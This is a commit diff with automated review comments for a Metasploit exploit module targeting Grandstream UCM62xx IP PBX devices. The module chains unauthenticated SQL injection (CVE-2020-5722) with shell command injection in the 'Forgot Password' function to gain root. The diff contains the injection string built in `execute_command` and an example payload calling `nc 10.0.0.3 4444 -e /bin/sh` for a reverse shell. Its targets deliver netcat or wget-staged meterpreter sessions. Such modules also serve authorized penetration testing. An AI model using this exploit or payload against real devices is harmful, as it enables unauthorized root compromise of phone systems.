Addressed multiple review comments (spelling, doc details, randomization, etc)
This commit is contained in:
parent
4ebb702405
commit
2c989ec714
@ -2,21 +2,35 @@

### Description

This module exploits unauthenticated SQL and command injection vulnerabilities affecting
the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
unauthenticated and remote attacker to execute commands as root. This module affects
UCM62xx versions before firmware version 1.0.19.20.
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
a command injection vulnerability (technically, no assigned CVE but was inadvertently
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
execute commands as `root`.

Exploitation happens in two stages:

1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. After successful SQL injection the user provided username is passed to a python script
via the shell. Like so:

```
/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `
```

This module affect UCM62xx versions before firmware version 1.0.19.20.

### Installation

The UCM62xx PBX is a physical device and is not known to be succesfully emulated.
The UCM62xx PBX is a physical device and is not known to have been successfully emulated.
However, if you have a device, affected firmware can be downloaded here:

* https://firmware.grandstream.com/Release_UCM62xx_1.0.18.13.zip

## Verification Steps

* Acquire an affected device and configure with affected firmware
* Acquire an affected device and configure it with the affected firmware
* Do: `use exploit/linux/http/grandstream_ucm62xx_sendemail_rce`
* Do: `set RHOST <ip>`
* Do: `check`

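Review bot: the new closing sentence `This module affect UCM62xx versions before firmware version 1.0.19.20.` should read `affects`, and the same sentence is duplicated into the module's `%q{}` Description, so fix it in both places. Two smaller doc points in this hunk: the fenced block under "Like so:" has no language tag (a ```sh fence would render the quoting more readably), and the example still shows the fixed `z' or 1=1--` username while `execute_command` now sends a randomized `' or N=N--`, so either update the example or state that the live value is randomized.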
@ -30,11 +44,11 @@ However, if you have a device, affected firmware can be downloaded here:

### 0

By default, this targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.
This targets the PBX with the `reverse_netcat_gaping` payload and returns a reverse shell.

### 1

By default, this target obtains a meterpreter session using `wget`.
This target obtains a meterpreter session using `wget`.

## Options

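Review bot: dropping "By default" from both target descriptions removes the contradiction, but the documentation now never says which target is selected by default. Add one sentence (above `### 0` or under it) naming the default target so a user who runs `check`/`exploit` without `set TARGET` knows whether to expect the netcat reverse shell or the `wget`-staged meterpreter path.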
@ -103,7 +117,7 @@ Revision : 63015
Serial : 1126b9d4eacb275c
```

### Grandstream UCM6202 IP PBX fimrware version 1.0.18.13. Get reverse shell using netcat.
### Grandstream UCM6202 IP PBX firmware version 1.0.18.13. Get reverse shell using netcat.

```
msf6 > use exploit/linux/http/grandstream_ucm62xx_sendemail_rce

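Review bot: the `fimrware` to `firmware` heading fix is fine. While this transcript is being touched, consider redacting the device serial in the context line `Serial : 1126b9d4eacb275c`; a real unit's serial number adds nothing to the verification output and does not need to be published in the module docs.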
@ -16,10 +16,22 @@ class MetasploitModule < Msf::Exploit::Remote
info,
'Name' => 'Grandstream UCM62xx IP PBX sendPasswordEmail RCE',
'Description' => %q{
This module exploits unauthenticated SQL and command injection vulnerabilities affecting
the Grandstream UCM62xx IP PBX series of devices. The vulnerabilities allow an
unauthenticated and remote attacker to execute commands as root. This module affects
UCM62xx versions before firmware version 1.0.19.20.
This module exploits an unauthenticated SQL injection vulnerability (CVE-2020-5722) and
a command injection vulnerability (technically, no assigned CVE but was inadvertently
patched at the same time as CVE-2019-10662) affecting the Grandstream UCM62xx IP PBX
series of devices. The vulnerabilities allow an unauthenticated and remote attacker to
execute commands as root.

Exploitation happens in two stages:

1. An SQL injection during username lookup while executing the "Forgot Password" function.
2. After successful SQL injection the user provided username is passed to a python script
via the shell. Like so:

/bin/sh -c python /app/asterisk/var/lib/asterisk/scripts/sendMail.py \
password '' `cat <<'TTsf7G0' z' or 1=1--`;`nc 10.0.0.3 4444 -e /bin/sh`;` TTsf7G0 `

This module affect UCM62xx versions before firmware version 1.0.19.20.
},
'License' => MSF_LICENSE,
'Author' => [

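Review bot: `This module affect UCM62xx versions before firmware version 1.0.19.20.` inside the `%q{}` Description has the same `affect`/`affects` typo as the documentation; since the two texts are meant to be identical, fix both together. Also, the two-line `/bin/sh -c python ...` illustration in `info` output hardcodes `nc 10.0.0.3 4444 -e /bin/sh`; a placeholder such as `<cmd>` in that position would match the `#{cmd}` interpolation in `execute_command` and make clear that the command is whatever the payload supplies.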
@ -55,10 +67,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'linux',
'Arch' => [ARCH_ARMLE],
'Type' => :linux_dropper,
'CmdStagerFlavor' => [ 'wget' ],
'DefaultOptions' => {
'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp'
}
'CmdStagerFlavor' => [ 'wget' ]
}
]
],

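Review bot: removing the per-target `'DefaultOptions' => { 'PAYLOAD' => 'linux/armle/meterpreter/reverse_tcp' }` leaves target 1 without a pinned payload, yet the documentation for `### 1` still promises a meterpreter session via `wget`. Confirm that a module-level `DefaultOptions` (or the `:linux_dropper` type together with `ARCH_ARMLE`) still causes a meterpreter payload to be selected when target 1 is chosen; if not, keep the `PAYLOAD` default here and just drop the duplicated `CmdStagerFlavor` entry.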
@ -95,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
###
def check
normalized_uri = normalize_uri(target_uri.path, '/cgi')
print_status("Requesting version information from #{normalized_uri}")
vprint_status("Requesting version information from #{normalized_uri}")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalized_uri,

@ -107,20 +116,17 @@ class MetasploitModule < Msf::Exploit::Remote
body_json = res.get_json_document
return CheckCode::Unknown('No JSON in response') unless body_json

resp_json = body_json['response']
return CheckCode::Unknown('The JSON response is missing the response element') unless resp_json
prog_version = body_json.dig('response', 'prog_version')
return false if prog_version.nil?

prog_version = resp_json['prog_version']
return CheckCode::Unknown('The JSON response is missing the prog_version element') unless prog_version

print_status("The reported version is: #{prog_version}")
vprint_status("The reported version is: #{prog_version}")

version = Rex::Version.new(prog_version)
if version < Rex::Version.new('1.0.19.20')
return CheckCode::Appears('This determination is based on the version string.')
return CheckCode::Appears("This determination is based on the version string: #{prog_version}.")
end

return CheckCode::Safe('This determination is based on the version string.')
return CheckCode::Safe("This determination is based on the version string: #{prog_version}.")
end

##

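Review bot: replacing `return false if prog_version.nil?` with `CheckCode::Unknown(...)` is the right fix, since `check` must always return a `CheckCode`. One gap remains: `Rex::Version.new(prog_version)` follows `Gem::Version` semantics and raises `ArgumentError` on a malformed version string, so an unexpected `prog_version` value (empty or non-numeric) would surface as an exception instead of `CheckCode::Unknown`. Wrap the construction and comparison in a `rescue ArgumentError` that returns `CheckCode::Unknown("Unparseable version string: #{prog_version}")`.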
@ -136,13 +142,14 @@ class MetasploitModule < Msf::Exploit::Remote
# payloads are appropriate.
###
def execute_command(cmd, _opts = {})
rand_num = Rex::Text.rand_text_numeric(1..5)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/cgi'),
'vars_post' =>
{
'action' => 'sendPasswordEmail',
'user_name' => 'z\' or 1=1--`;`' + cmd + '`;`'
'user_name' => "' or #{rand_num}=#{rand_num}--`;`#{cmd}`;`"
}
}, 5)

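Review bot: confirm that `Rex::Text.rand_text_numeric` accepts a `Range` (`1..5`) as its length argument in the rex-text version the framework pins; if it only takes an Integer, use `rand_text_numeric(rand(1..5))` instead. The randomized `' or #{rand_num}=#{rand_num}--` also drops the leading `z` that the old `'z\' or 1=1--...'` string and the documentation example still show, so update the docs (or note there that the value is randomized) to keep them in sync.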